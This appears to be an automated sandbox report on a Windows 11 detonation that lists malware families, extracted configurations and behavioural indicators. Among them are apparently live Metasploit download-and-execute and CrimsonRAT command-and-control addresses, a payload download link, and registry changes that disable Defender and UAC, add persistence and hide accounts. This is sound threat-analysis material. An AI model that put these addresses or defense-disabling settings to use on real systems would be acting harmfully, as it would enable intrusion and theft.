Analysis
max time kernel: 742s
max time network: 745s
platform: windows11-21h2_x64
resource: win11-20240802-en
resource tags: arch:x64 arch:x86 image:win11-20240802-en locale:en-us os:windows11-21h2-x64 system
submitted: 05-08-2024 22:55
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://pornhub.com
Resource: win11-20240802-en
General
Malware Config
Extracted
metasploit
windows/download_exec
http://149.129.72.37:23456/SNpK
- headers User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP09; NP09; MAAU)
Extracted
crimsonrat
185.136.161.124
Extracted
modiloader
https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
CrimsonRAT main payload 1 IoCs
Processes:
resource | yara_rule
C:\ProgramData\Hdlharas\dlrarhsiva.exe | family_crimsonrat
-
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
CryptoLocker
Ransomware family with multiple variants.
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies WinLogon for persistence 2 TTPs 3 IoCs
Processes:
winupdate.exe, winupdate.exe, Blackkomet.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe" | winupdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe" | winupdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe" | Blackkomet.exe
-
Processes:
Azorult.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | Azorult.exe
-
Modifies visibility of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
taskhostw.exe
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | taskhostw.exe
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exe
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 2716 | 5036 | rundll32.exe | WINWORD.EXE
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Processes:
regedit.exe, Azorult.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | regedit.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | regedit.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | regedit.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | Azorult.exe
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Processes:
regedit.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | regedit.exe
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
ModiLoader First Stage 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\Downloads\Unconfirmed 195103.crdownload | modiloader_stage1
behavioral1/memory/3488-1296-0x0000000010410000-0x000000001047E000-memory.dmp | modiloader_stage1
-
ReZer0 packer 1 IoCs
Detects ReZer0, a packer with multiple versions used in various campaigns.
Processes:
resource | yara_rule
behavioral1/memory/5688-2377-0x0000000005180000-0x00000000051A8000-memory.dmp | rezer0
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
-
RevengeRat Executable 1 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\Downloads\Unconfirmed 838035.crdownload | revengerat
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exe
flow | pid | process
82 | 2716 | rundll32.exe
-
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
Processes:
Azorult.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | Azorult.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | Azorult.exe
Key created | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | Azorult.exe
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
Azorult.exe, cmd.exe
description | ioc | process
File opened for modification | C:\Windows\System32\drivers\etc\hosts | Azorult.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | cmd.exe
-
Modifies Windows Firewall 2 TTPs 24 IoCs
-
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
Processes:
RDPWInst.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | RDPWInst.exe
-
Sets file to hidden 1 TTPs 9 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe, attrib.exe
pid | process
5384 | attrib.exe
2356 | attrib.exe
2484 | attrib.exe
716 | attrib.exe
4704 | attrib.exe
2916 | attrib.exe
5736 | attrib.exe
4320 | attrib.exe
1960 | attrib.exe
-
Drops startup file 8 IoCs
Processes:
NJRat.exe, RegSvcs.exe, RegSvcs.exe
description | ioc | process
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe | NJRat.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:SmartScreen:$DATA | NJRat.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:Zone.Identifier:$DATA | NJRat.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe | RegSvcs.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe\:SmartScreen:$DATA | RegSvcs.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe\:Zone.Identifier:$DATA | RegSvcs.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe | RegSvcs.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe | NJRat.exe
-
Executes dropped EXE 59 IoCs
Processes:
Blackkomet.exe, winupdate.exe, winupdate.exe, CrimsonRAT.exe, dlrarhsiva.exe, CrimsonRAT.exe, dlrarhsiva.exe, NJRat.exe, NetWire.exe, NetWire.exe, RevengeRAT.exe, WarzoneRAT.exe, svchost.exe, svchost.exe, AgentTesla.exe, butterflyondesktop.exe, butterflyondesktop.tmp, svchost.exe, ButterflyOnDesktop.exe, Azorult.exe, wini.exe, winit.exe, rutserv.exe, rutserv.exe, rutserv.exe, rutserv.exe, rfusclient.exe, rfusclient.exe, cheat.exe, taskhost.exe, P.exe, ink.exe, svchost.exe, rfusclient.exe, R8.exe, winlog.exe, winlogon.exe, Rar.exe, taskhostw.exe, RDPWInst.exe, winlogon.exe, RDPWInst.exe, taskhostw.exe, WinNuke.98.exe, ButterflyOnDesktop.exe, ButterflyOnDesktop.exe, ButterflyOnDesktop.exe, ButterflyOnDesktop.exe, ButterflyOnDesktop.exe, ButterflyOnDesktop.exe, ButterflyOnDesktop.exe, ButterflyOnDesktop.exe, ButterflyOnDesktop.exe, $uckyLocker.exe, taskhostw.exe, CryptoLocker.exe, {34184A33-0407-212E-3320-09040709E2C2}.exe, {34184A33-0407-212E-3320-09040709E2C2}.exe, taskhostw.exe
pid | process
4100 | Blackkomet.exe
1704 | winupdate.exe
4588 | winupdate.exe
2108 | CrimsonRAT.exe
3936 | dlrarhsiva.exe
2252 | CrimsonRAT.exe
2116 | dlrarhsiva.exe
2328 | NJRat.exe
3488 | NetWire.exe
4812 | NetWire.exe
1436 | RevengeRAT.exe
5688 | WarzoneRAT.exe
548 | svchost.exe
1212 | svchost.exe
916 | AgentTesla.exe
6084 | butterflyondesktop.exe
4500 | butterflyondesktop.tmp
3176 | svchost.exe
4716 | ButterflyOnDesktop.exe
3696 | Azorult.exe
4024 | wini.exe
2420 | winit.exe
2364 | rutserv.exe
3144 | rutserv.exe
5816 | rutserv.exe
5284 | rutserv.exe
3388 | rfusclient.exe
4776 | rfusclient.exe
5872 | cheat.exe
2248 | taskhost.exe
6036 | P.exe
1472 | ink.exe
5288 | svchost.exe
5816 | rfusclient.exe
5868 | R8.exe
4672 | winlog.exe
6004 | winlogon.exe
800 | Rar.exe
428 | taskhostw.exe
5248 | RDPWInst.exe
808 | winlogon.exe
224 | RDPWInst.exe
784 | taskhostw.exe
2144 | WinNuke.98.exe
1280 | ButterflyOnDesktop.exe
3884 | ButterflyOnDesktop.exe
5828 | ButterflyOnDesktop.exe
5336 | ButterflyOnDesktop.exe
2588 | ButterflyOnDesktop.exe
4144 | ButterflyOnDesktop.exe
872 | ButterflyOnDesktop.exe
1104 | ButterflyOnDesktop.exe
3648 | ButterflyOnDesktop.exe
916 | $uckyLocker.exe
200 | taskhostw.exe
5304 | CryptoLocker.exe
5272 | {34184A33-0407-212E-3320-09040709E2C2}.exe
5456 | {34184A33-0407-212E-3320-09040709E2C2}.exe
6012 | taskhostw.exe
-
Loads dropped DLL 1 IoCs
Processes:
svchost.exe
pid | process
5600 | svchost.exe
-
Modifies file permissions 1 TTPs 62 IoCs
-
Processes:
resource | yara_rule
C:\ProgramData\Microsoft\Intel\winlogon.exe | upx
behavioral1/memory/6004-3634-0x0000000000400000-0x0000000000419000-memory.dmp | upx
behavioral1/memory/6004-3647-0x0000000000400000-0x0000000000419000-memory.dmp | upx
C:\Users\Admin\AppData\Local\Temp\autE112.tmp | upx
behavioral1/memory/808-3672-0x0000000000330000-0x000000000041C000-memory.dmp | upx
behavioral1/memory/808-3674-0x0000000000330000-0x000000000041C000-memory.dmp | upx
-
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
Processes:
{34184A33-0407-212E-3320-09040709E2C2}.exe, winupdate.exe, winupdate.exe, notepad.exe, NJRat.exe, RegSvcs.exe, taskhostw.exe, Blackkomet.exe, NetWire.exe, butterflyondesktop.tmp
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\CryptoLocker = "C:\\Users\\Admin\\AppData\\Roaming\\{34184A33-0407-212E-3320-09040709E2C2}.exe" | {34184A33-0407-212E-3320-09040709E2C2}.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe" | winupdate.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe" | winupdate.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe" | notepad.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .." | NJRat.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe" | RegSvcs.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | taskhostw.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe" | Blackkomet.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .." | NJRat.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" | NetWire.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop | butterflyondesktop.tmp
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Azorult.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Azorult.exe
-
Indicator Removal: Clear Persistence 1 TTPs 3 IoCs
Clear artifacts associated with previously established persistence like scheduled tasks on a host.
Processes:
cmd.exe, cmd.exe, cmd.exe
pid | process
4032 | cmd.exe
960 | cmd.exe
1596 | cmd.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs
Processes:
flow | ioc
18 | raw.githubusercontent.com
77 | raw.githubusercontent.com
86 | drive.google.com
146 | 0.tcp.ngrok.io
232 | raw.githubusercontent.com
91 | 0.tcp.ngrok.io
222 | 0.tcp.ngrok.io
235 | raw.githubusercontent.com
254 | 0.tcp.ngrok.io
234 | iplogger.org
332 | 0.tcp.ngrok.io
88 | drive.google.com
92 | 0.tcp.ngrok.io
222 | raw.githubusercontent.com
222 | iplogger.org
235 | 0.tcp.ngrok.io
250 | raw.githubusercontent.com
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
222 | ip-api.com
-
Modifies WinLogon 2 TTPs 7 IoCs
Processes:
Azorult.exe, RDPWInst.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | Azorult.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | Azorult.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | RDPWInst.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | Azorult.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | Azorult.exe
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 5 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource | yara_rule
C:\Users\Admin\Downloads\Unconfirmed 862354.crdownload | autoit_exe
C:\ProgramData\Windows\winit.exe | autoit_exe
C:\ProgramData\Microsoft\Intel\taskhost.exe | autoit_exe
behavioral1/memory/808-3672-0x0000000000330000-0x000000000041C000-memory.dmp | autoit_exe
behavioral1/memory/808-3674-0x0000000000330000-0x000000000041C000-memory.dmp | autoit_exe
-
Drops file in System32 directory 21 IoCs
Processes:
winupdate.exe, attrib.exe, powershell.exe, Blackkomet.exe, winupdate.exe, notepad.exe, attrib.exe, RDPWInst.exe, attrib.exe, attrib.exe
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\Windupdt\ | winupdate.exe
File opened for modification | C:\Windows\SysWOW64\Windupdt\winupdate.exe | attrib.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | powershell.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | powershell.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | powershell.exe
File opened for modification | C:\Windows\SysWOW64\Windupdt\winupdate.exe | Blackkomet.exe
File created | C:\Windows\SysWOW64\Windupdt\winupdate.exe:Zone.Identifier:$DATA | Blackkomet.exe
File opened for modification | C:\Windows\SysWOW64\Windupdt\ | winupdate.exe
File created | C:\Windows\SysWOW64\Windupdt\winupdate.exe | winupdate.exe
File created | C:\Windows\SysWOW64\Windupdt\winupdate.exe | notepad.exe
File opened for modification | C:\Windows\SysWOW64\Windupdt | attrib.exe
File opened for modification | C:\Windows\System32\GroupPolicy | powershell.exe
File created | C:\Windows\System32\rfxvmt.dll | RDPWInst.exe
File created | C:\Windows\SysWOW64\Windupdt\winupdate.exe:SmartScreen:$DATA | Blackkomet.exe
File opened for modification | C:\Windows\SysWOW64\Windupdt\winupdate.exe | winupdate.exe
File opened for modification | C:\Windows\SysWOW64\Windupdt | attrib.exe
File opened for modification | C:\Windows\SysWOW64\Windupdt\winupdate.exe | winupdate.exe
File created | C:\Windows\SysWOW64\Windupdt\winupdate.exe | Blackkomet.exe
File opened for modification | C:\Windows\SysWOW64\Windupdt\ | Blackkomet.exe
File created | C:\Windows\SysWOW64\Windupdt\winupdate.exe | winupdate.exe
File opened for modification | C:\Windows\SysWOW64\Windupdt\winupdate.exe | attrib.exe
-
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
Processes:
regedit.exe, reg.exe, Azorult.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | regedit.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | Azorult.exe
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
$uckyLocker.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Control Panel\Desktop\Wallpaper = "0" | $uckyLocker.exe
-
Suspicious use of SetThreadContext 12 IoCs
Processes:
NetWire.exe, RevengeRAT.exe, RegSvcs.exe, WarzoneRAT.exe, svchost.exe, RegSvcs.exe, svchost.exe, RegSvcs.exe, svchost.exe, RegSvcs.exe, svchost.exe, RegSvcs.exe
description | pid | process | target process
PID 4812 set thread context of 2088 | 4812 | NetWire.exe | ieinstal.exe
PID 1436 set thread context of 2856 | 1436 | RevengeRAT.exe | RegSvcs.exe
PID 2856 set thread context of 3988 | 2856 | RegSvcs.exe | RegSvcs.exe
PID 5688 set thread context of 2468 | 5688 | WarzoneRAT.exe | MSBuild.exe
PID 548 set thread context of 4744 | 548 | svchost.exe | RegSvcs.exe
PID 4744 set thread context of 4980 | 4744 | RegSvcs.exe | RegSvcs.exe
PID 1212 set thread context of 5236 | 1212 | svchost.exe | RegSvcs.exe
PID 5236 set thread context of 5320 | 5236 | RegSvcs.exe | RegSvcs.exe
PID 3176 set thread context of 4880 | 3176 | svchost.exe | RegSvcs.exe
PID 4880 set thread context of 2292 | 4880 | RegSvcs.exe | RegSvcs.exe
PID 5288 set thread context of 5768 | 5288 | svchost.exe | RegSvcs.exe
PID 5768 set thread context of 3124 | 5768 | RegSvcs.exe | RegSvcs.exe
-
Drops file in Program Files directory 43 IoCs
Processes:
attrib.exe, AgentTesla.exe, butterflyondesktop.tmp, Azorult.exe, RDPWInst.exe, attrib.exe
description | ioc | process
File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.dll | attrib.exe
File created | C:\Program Files (x86)\Briano\UWPHook\SharpSteam.dll | AgentTesla.exe
File opened for modification | C:\Program Files (x86)\Butterfly on Desktop\unins000.dat | butterflyondesktop.tmp
File opened for modification | C:\Program Files (x86)\Microsoft JDX | Azorult.exe
File opened for modification | C:\Program Files (x86)\Kaspersky Lab | Azorult.exe
File opened for modification | C:\Program Files (x86)\Cezurity | Azorult.exe
File created | C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll | AgentTesla.exe
File created | C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.dll | AgentTesla.exe
File opened for modification | C:\Program Files (x86)\Zaxar | Azorult.exe
File opened for modification | C:\Program Files\Kaspersky Lab | Azorult.exe
File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | RDPWInst.exe
File opened for modification | C:\Program Files\AVAST Software | Azorult.exe
File created | C:\Program Files (x86)\Butterfly on Desktop\is-TMLJN.tmp | butterflyondesktop.tmp
File created | C:\Program Files (x86)\Butterfly on Desktop\is-IOG49.tmp | butterflyondesktop.tmp
File created | C:\Program Files (x86)\Butterfly on Desktop\is-N6STH.tmp | butterflyondesktop.tmp
File opened for modification | C:\Program Files\ByteFence | Azorult.exe
File opened for modification | C:\Program Files\SpyHunter | Azorult.exe
File opened for modification | C:\Program Files\ESET | Azorult.exe
File created | C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll | AgentTesla.exe
File created | C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.xml | AgentTesla.exe
File created | C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe | AgentTesla.exe
File created | C:\Program Files (x86)\Butterfly on Desktop\unins000.dat | butterflyondesktop.tmp
File opened for modification | C:\Program Files\Malwarebytes | Azorult.exe
File created | C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll | AgentTesla.exe
File created | C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.xml | AgentTesla.exe
File created | C:\Program Files (x86)\Briano\UWPHook\VDFParser.dll | AgentTesla.exe
File created | C:\Program Files (x86)\Butterfly on Desktop\is-C1R79.tmp | butterflyondesktop.tmp
File opened for modification | C:\Program Files\Enigma Software Group | Azorult.exe
File created | C:\Program Files\Common Files\System\iediagcmd.exe | Azorult.exe
File opened for modification | C:\Program Files\COMODO | Azorult.exe
File opened for modification | C:\Program Files (x86)\AVAST Software | Azorult.exe
File opened for modification | C:\Program Files (x86)\AVG | Azorult.exe
File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | attrib.exe
File opened for modification | C:\Program Files\RDP Wrapper | attrib.exe
File created | C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config | AgentTesla.exe
File opened for modification | C:\Program Files (x86)\SpyHunter | Azorult.exe
File opened for modification | C:\Program Files\Cezurity | Azorult.exe
File opened for modification | C:\Program Files\Common Files\McAfee | Azorult.exe
File opened for modification | C:\Program Files (x86)\Panda Security | Azorult.exe
File opened for modification | C:\Program Files (x86)\360 | Azorult.exe
File opened for modification | C:\Program Files\AVG | Azorult.exe
File opened for modification | C:\Program Files (x86)\GRIZZLY Antivirus | Azorult.exe
File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | RDPWInst.exe
-
Launches sc.exe 24 IoCs
Sc.exe is a Windows utility to control services on the system.
-
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 14 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
Processes:
msedge.exe, msedge.exe, msedge.exe, msedge.exe, msedge.exe, msedge.exe, msedge.exe, msedge.exe, msedge.exe, msedge.exe, msedge.exe, msedge.exe, msedge.exe, msedge.exe
description | ioc | process
File opened for modification | C:\Users\Admin\Downloads\Blackkomet.exe:Zone.Identifier | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\butterflyondesktop.exe:Zone.Identifier | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\WinNuke.98.exe:Zone.Identifier | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\RevengeRAT.exe:Zone.Identifier | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\MadMan.exe:Zone.Identifier | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\CryptoLocker.exe:Zone.Identifier | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\Adwind.exe:Zone.Identifier | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\CrimsonRAT.exe:Zone.Identifier | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\NJRat.exe:Zone.Identifier | msedge.exe
